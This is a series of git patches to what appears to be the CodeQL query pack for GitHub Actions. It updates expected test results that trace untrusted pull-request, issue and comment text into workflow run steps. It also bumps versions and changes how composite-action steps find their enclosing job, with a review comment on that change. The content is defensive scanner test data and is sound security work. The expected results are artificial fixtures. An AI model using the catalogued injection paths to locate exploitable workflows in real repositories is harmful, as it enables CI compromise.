| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | 
@@ -411,6 +464,9 @@ subpaths | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 75b64cea3e59..3ad4e6915d23 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input 
title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | 
.github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | 
@@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -387,6 +435,8 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
index 008c36967890..6d56b99407e0 100644
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
@@ -19,12 +19,12 @@ | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | 
.github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned 
commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step |
From 0d55b4e784117431fd8be4c510a11975d857b5e8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 21:59:10 +0200
Subject: [PATCH 534/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 84d4f5f3678e..4c1252d976d4 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.51
+version: 0.1.52
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 0ef4c721e1a2..a8c891b256a4 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.51
+version: 0.1.52
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 356c20015832da0d2bf43c6d5f90c7beef74d4ac Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 23:03:55 +0200
Subject: [PATCH 535/707] Composite Action steps's getEnclosingJob should return the calling job
---
 ql/lib/codeql/actions/ast/internal/Ast.qll | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index d1c7718d77b4..7659661bdac9 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -105,7 +105,10 @@ abstract class AstNodeImpl extends TAstNode {
 /**
 * Gets the enclosing Job.
 */
- JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() }
+ JobImpl getEnclosingJob() {
+ result.getAChildNode*() = this.getParentNode() or
+ result = this.getEnclosingCompositeAction().getACallerJob()
+ }
 /**
 * Gets the enclosing workflow if any.
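Review bot: With the added `or` branch, `getEnclosingJob()` is no longer single-valued for a step inside a composite action: it now yields every job that `getACallerJob()` returns, so an action used from several jobs or workflows has several "enclosing" jobs at once. Any query that derives a property from the enclosing job (its permissions, its guard conditions, its trigger) will be evaluated once per caller, and a finding may be produced or suppressed on the basis of a job the step does not actually run in; how `getACallerJob()` resolves callers is outside this hunk, so whether that set is further constrained is unclear from here. The doc comment should say so: `Gets the enclosing Job. For a step of a composite action this is each job that calls the action, so the result may be multi-valued.` The enclosing class `AstNodeImpl` continues outside the hunk.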
From 43b61eb072615ac98509e19817540b7792b78eec Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 23:04:57 +0200
Subject: [PATCH 536/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 4c1252d976d4..a8a194c52ba6 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.52
+version: 0.1.53
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index a8c891b256a4..e4cb89696496 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.52
+version: 0.1.53
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 153fb492f72724145785678206e81668ae114f76 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 23:14:37 +0200
Subject: [PATCH 537/707] Update tests
---
 .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 +
 .../Security/CWE-829/.github/workflows/untrusted_checkout3.yml | 2 +-
 .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 +
 3 files changed, 3 insertions(+), 1 deletion(-)
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
